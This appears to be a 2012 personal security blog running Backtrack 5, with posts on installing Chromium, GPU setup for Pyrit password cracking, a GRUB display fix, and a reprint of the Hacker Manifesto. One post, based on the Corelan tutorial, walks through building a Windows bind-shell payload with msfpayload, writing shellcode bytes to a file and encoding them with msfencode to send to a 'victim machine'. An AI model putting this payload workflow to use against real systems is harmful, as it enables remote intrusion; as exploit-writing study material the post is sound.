Saturday, November 10, 2012

Installing Google Chrome in Backtrack 5

As many of you have noticed Google Chrome doesn't come installed in Backtrack 5.
So, in this post we will learn how to install it.
The installation was made in Backtrack 5 R3.


Step 1

Open a new command session and type:

apt-get install chromium-browser

Step 2

Access the chrome browser directory:

cd /usr/lib/chromium-browser

Buffer Overflow - Some thoughts

In this post I'll talk about Buffer Overflow Exploitation in Windows.

Have in mind that this is not intentioned to make you learn, or anything like that, this blog is for personal use, and will contain info that I don't wanna lose or forget. Anyway, I share with everyone, so that it can be helpful for other people.

I learn about buffer overflow from the below link, one of the many tutorials of corelan team:
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

That is an extremely good tutorial, one that you actually can follow, and understand, and specially one that you can test yourself.

At the end of the tutorial, you have a type of challenge, where you should be able to make your shellcode to be able to get a telnet connection on the remote computer, getting that shellcode to insert on the exploit is the challenge part.

The way I found to do it was:

Get the payload from the msfpayload:

msfpayload windows/shell_bind_tcp


That will create the shell code of a telnet connection with an open port at 4444(default)

Now, if you test it, it will not work, because it have probably null's and bad chars not supported on the RMtoMP3 application, so we have to use and encoder.

Here come's the trick:

Step 1

Imagine this is the shell code(this is just and example):

\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18
\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b
\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac
\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4
\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b

 
what you have to do, is create a scrip, that write the shell code in a binary file.
For this example, I will use perl as script language:

 #!/usr/bin/python

shell = ("\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b")
file = open('shellcode.bin','w')
file.write(shell)
file.close()

 
Step 2

After running the script you will have a shellcode.bin file. So now, is time to use our encoder:

msfencode -e x86/alpha_upper -b '\x00' -i Desktop/shellcode.bin -t c

Where:
 -e ... -> is the type of encoder you wanna use. you can get a list of then using msfencode -l

-b ... -> is the characters you want to avoid, in this case the null

-i ... -> is the file you want to encode

and

-t ... -> is the output file format

With this all set, you just now have the correct shell code, and now just need to add it to your own exploit.

Send it to the victim machine and Voilá!!!

Saturday, November 3, 2012

Install Pyrit and the same as CUDA but now for ATI

In this post I was about to present here the opponent of CUDA.

If you have a nVIDIA driver you should use CUDA, and for that you should follow this link:How to Install Cuda on nVIDIA Optimus

If that's not your case and you have an ATI you should go for OpenCL.

I could make a tutorial here, how to install it, but actually in backtrack wiki you can find a very good one, done with the contribution of "g0tmi1k". Check it here: http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL

I'll show you some result I got using pyrit:

Hardware:

Running in 32Gb USB drive
OS: Backtrack 5 R3
Display Card: AMD Radeon HD 6950 DirectCUII 1GB GDDR5
CPU: Core 2 Quad Q6600 2.4Ghz
RAM: 4096MB



As far as I can say, I advice the use of ATI drives to crack passwords, because they are really much faster then CUDA imo.

How to Install CUDA on nVIDIA Optimus with Backtrack 5 R3

In this post you will learn how to setup a notebook with nVidia Optimus technology working with CUDA.

All this information that I will present you here, would not be possible without the help of "Samiux" that helped me to pass through this problem.
You can find his blog here: http://samiux.blogspot.hk

This was tested in my own notebook with the below specs:

Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4Ghz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3


Fix Blank Screen when using Startx

When Backtrack 5 was released, the most common issue was blank screen when using "startx" command to start the GUI mode. This common issue is caused by the unsupport drivers of VGA on some machines. This blank screen issue is still found on Backtrack 5 R1,R2 and recently  Backtrack R3.
When I install Backtrack 5 R3 I came across this problem, but managed to find a fix:
What we need to do is add some code to the Grub file.
If you're using a live CD or live USB you will come across with the below menu, and there you should select the "Default Boot Text Mode" and press "Tab".
You should then, add the following code "i915.modeset=1" to the grub editor after the "vga = 791 splash text" and then press[enter].as


If after installing Backtrack the problem persist you should then edit the Grub configuration file located in /etc/default/grub
Find the line that says:

GRUB_CMDLINE_LINUX_DEFAULT

and add the same code "i915.modeset=1" after the "vga = 791 splash text".

After it issue:

update-grub and fix-splash commands.

It should be working properly now.
If not, check my next two Fix's.






The Hacker Manifesto

My 1st post will go to this important manifesto in the hacker community.
The Manifesto, was writen in 1986 by Loyd Blankenship aka "The Mentor".

You can find the Manifesto below in text and in mp3 with "The Mentor" reading his own Manifesto and talking about it and his history.



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...

                       \/\The Conscience of a Hacker/\/

                                      by

                               +++The Mentor+++

                          Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Another one got caught today, it's all over the papers.  "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
        Damn kids.  They're all alike.

        But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker?  Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
        I am a hacker, enter my world...
        Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
        Damn underachiever.  They're all alike.

        I'm in junior high or high school.  I've listened to teachers explain
for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
Smith, I didn't show my work.  I did it in my head..."
        Damn kid.  Probably copied it.  They're all alike.

        I made a discovery today.  I found a computer.  Wait a second, this is
cool.  It does what I want it to.  If it makes a mistake, it's because I
screwed it up.  Not because it doesn't like me...
                Or feels threatened by me...
                Or thinks I'm a smart ass...
                Or doesn't like teaching and shouldn't be here...
        Damn kid.  All he does is play games.  They're all alike.

        And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
        "This is it... this is where I belong..."
        I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
        Damn kid.  Tying up the phone line again.  They're all alike...

        You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless.  We've been dominated by sadists, or
ignored by the apathetic.  The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

        This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals.  We explore... and you call us criminals.  We seek
after knowledge... and you call us criminals.  We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

        I am a hacker, and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.

                               +++The Mentor+++
_______________________________________________________________________________
 The Hacker Manifesto by "The Mentor".mp3